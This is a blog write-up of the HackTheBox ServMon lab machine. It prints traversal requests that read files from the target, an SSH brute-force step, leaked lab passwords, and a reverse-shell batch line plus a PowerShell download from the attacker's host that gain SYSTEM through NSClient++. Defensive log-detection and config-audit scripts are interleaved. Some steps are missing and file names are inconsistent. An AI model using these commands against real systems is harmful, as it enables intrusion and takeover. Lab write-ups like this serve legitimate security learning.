HackTheBox ServMon Writeup – 10.10.10.184

HackTheBox ServMon (10.10.10.184) is a simple and easy machine. It runs a TVT NVMS-1000 NVR that allows attackers to perform a Directory Traversal attack against the device and the system it is installed on. In today’s ServMon Writeup I’m going to use one of the known CVEs (CVE-2019-20085) to gain an initial foothold, and then escalate further to gain SYSTEM access using another vulnerable service installed on the machine (NSClient++).

Difficulty: Easy

Enumeration

As always, I add the machine IP 10.10.10.184 to my hosts file as servmon.htb for convenience and proceed with the NMAP scan.

NMAP Result

# root @ ns09 in ~/htb/servmon [12:30:05] 
$ nmap -T4 -A -sV -sS servmon.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 12:30 +03
Stats: 0:02:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 95.49% done; ETC: 12:32 (0:00:00 remaining)
Nmap scan report for servmon.htb (10.10.10.184)
Host is up (0.12s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|_    Sat:Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m45s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-16T09:35:17
|_  start_date: N/A

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   123.30 ms 10.10.14.1
2   123.70 ms servmon.htb (10.10.10.184)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.67 seconds

# root @ ns09 in ~/htb/servmon [12:32:39] 
$ 

The NMAP scan shows a few open ports. FTP is running with anonymous login allowed, so I went ahead and checked it first.

The FTP server contains a directory “Users” in which the “Nadine” and “Nathan” directories reside. Inside the Nadine directory there is a text file “Confidential.txt”, and Nathan has a file “Notes to do.txt”. Both files read as below:

So, according to Nadine’s note, there is a file named “Passwords” on Nathan’s desktop. According to Nathan’s to-do list, the NVMS passwords have been changed and NSClient access has been locked down, but the password upload has not been done, public access to NVMS has not been removed, and the secret files have not been uploaded to SharePoint.

I started to enumerate more using the open ports.

The web server on port 80 shows the login page of an NVMS-1000 NVR. This is the device whose public access Nathan did not get around to blocking.

A quick Google search showed me that certain “NVMS 1000” NVR models are vulnerable to Directory Traversal attacks. Exploit: https://www.exploit-db.com/exploits/47774

Directory Traversal Attack Using Burp Suite

I intercepted the request using Burp and modified it into the following directory traversal request:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1

From Repeater I was able to read the win.ini file, which resides inside the protected Windows folder.

Next is reading the Passwords.txt file Nadine left on Nathan’s desktop. I tried the following:

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1

And yes, I have the passwords stored on Nathan’s desktop:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
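For the defender’s side of the two requests above, here is an added example (my own code, not part of the original writeup) that runs over constructed web-server log lines and flags requests that climb above the web root, including percent-encoded, double-encoded and backslash variants that a plain “../” string match would miss. The log format and the sample lines are assumptions.

```python
from urllib.parse import unquote

# Constructed W3C-style log lines (sample input, not from the original box):
# date time client-ip method uri-stem query port username status
SAMPLE_LOG = """\
2020-04-16 09:35:17 10.10.14.13 GET /Pages/login.htm - 80 - 200
2020-04-16 09:35:40 10.10.14.13 GET /../../../../../../../../../../../../windows/win.ini - 80 - 200
2020-04-16 09:36:02 10.10.14.13 GET /%2e%2e/%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt - 80 - 200
2020-04-16 09:36:30 10.10.14.13 GET /Pages/../Pages/login.htm - 80 - 200
2020-04-16 09:37:11 10.10.14.13 GET /..%5c..%5c..%5cwindows%5cwin.ini - 80 - 200
"""

def normalise(path: str) -> str:
    """Decode percent-encoding twice (catches double encoding) and unify slashes."""
    return unquote(unquote(path)).replace("\\", "/")

def escapes_webroot(path: str) -> bool:
    """True if the request path climbs above the web root after normalisation.
    A '..' that only backs out of a directory already entered (e.g. /Pages/../Pages)
    is not flagged, which keeps ordinary relative links out of the alerts."""
    depth = 0
    for seg in normalise(path).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def find_traversal(log_text: str) -> list:
    """Return (line_no, client_ip, normalised_path) for each traversal attempt."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        client, path = fields[2], fields[4]
        if escapes_webroot(path):
            hits.append((n, client, normalise(path)))
    return hits

if __name__ == "__main__":
    for n, client, path in find_traversal(SAMPLE_LOG):
        print(f"line {n}: traversal from {client} -> {path}")
```

Run against the sample it reports lines 2, 3 and 5 only; the relative link on line 4 is left alone.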

I have the passwords but I’m not sure which user they belong to. A simple way to confirm is the Hydra login cracker. Hydra needs a wordlist to brute-force, so I used the list of passwords as the wordlist and the two users, Nadine and Nathan, as the usernames. I know SSH is running, so I ran Hydra against the SSH service and had the password cracked within seconds.

SSH Credential:

nadine:L1k3B1gBut7s@W0rk

I SSH into the box as user Nadine and grab User.txt from Nadine’s desktop.

Exploiting NSClient++ Service and Privilege Escalation

As we already know from the NMAP scan, NSClient++ is running on port 8443. Upon visiting https://10.10.10.184:8443, I found the following web app.

I wasn’t able to do anything on the web app, so I went back to Google and found another exploit that reveals the application administrator’s password, which is stored in clear text. WT*!!! The exploit’s prerequisite is to have access to the system, as the attack can only be performed locally. I was already logged in to the system as Nadine, so this should be easy.

Obtaining Admin password:

As I mentioned above, the exploit has to go through localhost (127.0.0.1). Using SSH we can forward the target’s local port to our machine. A simple command will do that:

ssh nadine@10.10.10.184 -L 8888:127.0.0.1:8443

  • My local port is 8888
  • And the application running on localhost 127.0.0.1:8443

I ran this command from another terminal and got logged in as Nadine; then from my browser I opened https://127.0.0.1:8888 and bingo, the web page loaded.

I used the admin password obtained earlier (ew2x6SsGTxjRwXOT) to log in to the app.

The exploit needs two files: nc.exe and Evil.bat. Evil.bat is just a batch file with a couple of lines that launch the reverse shell. I used Python’s SimpleHTTPServer to serve these two files to the target.

Evil.bat file:

@echo off
c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe

Downloading the files onto the ServMon machine using PowerShell:

powershell.exe wget "http://10.10.14.13:8899/nav1n.bat" -outfile "c:\Temp\nav1n.bat"

I start my listener in another terminal.

Adding a script “foobar” to call Evil.bat

I head back to the web page running on 127.0.0.1:8888 and go to Settings -> Scripts -> + Add new.

Adding a scheduler entry to call the script every minute

Restart the application

From the top right I clicked on Control and, from the drop-down menu, clicked Reload to restart the application. This triggers the command I added in the external scripts.
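For the blue-team side of this step, an added example (mine, not from the writeup or from NSClient++ itself) that audits an nsclient.ini fragment for the settings that made this chain work: a cleartext admin password, the web UI combined with external scripts, “allow arguments”, a localhost-only host restriction that a local user can bypass, and script paths in user-writable locations. The section and key names follow NSClient++’s documented layout but are assumptions here, as is the constructed sample.

```python
import configparser

# Constructed nsclient.ini fragment (sample input, not taken from the box).
# Section/key names are assumed from NSClient++'s documented layout; check
# them against the version you run.
SAMPLE_INI = """\
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = PLACEHOLDER-admin-password

[/settings/external scripts]
allow arguments = true

[/settings/external scripts/scripts]
foobar = c:\\temp\\evil.bat
"""

def _on(value: str) -> bool:
    return value.strip().lower() in ("enabled", "true", "1")

def audit_nsclient(ini_text: str) -> list:
    """Return human-readable findings for risky NSClient++ settings."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    sect = lambda name: cfg[name] if cfg.has_section(name) else {}
    mods, dflt, ext = sect("/modules"), sect("/settings/default"), sect("/settings/external scripts")
    findings = []
    if _on(mods.get("WEBServer", "")) and _on(mods.get("CheckExternalScripts", "")):
        findings.append("web UI and CheckExternalScripts both enabled: the admin password alone gives command execution")
    if _on(ext.get("allow arguments", "")):
        findings.append("allow arguments = true: callers can pass arbitrary arguments to external scripts")
    if "password" in dflt:
        findings.append("admin password stored in cleartext in nsclient.ini: restrict the file ACL to Administrators")
    if dflt.get("allowed hosts", "").strip() == "127.0.0.1":
        findings.append("allowed hosts = 127.0.0.1 only: does not stop a low-privileged local user (e.g. via SSH port forwarding)")
    if cfg.has_section("/settings/external scripts/scripts"):
        for name, path in cfg.items("/settings/external scripts/scripts"):
            if not path.strip().lower().startswith("c:\\program files"):
                findings.append(f"script '{name}' lives outside Program Files ({path}): may be writable by non-admins")
    return findings

if __name__ == "__main__":
    for f in audit_nsclient(SAMPLE_INI):
        print("FINDING:", f)
```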

Reverse Shell As System

I have the reverse shell as SYSTEM in my listener, and I immediately grab root.txt.

That’s all folks, thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
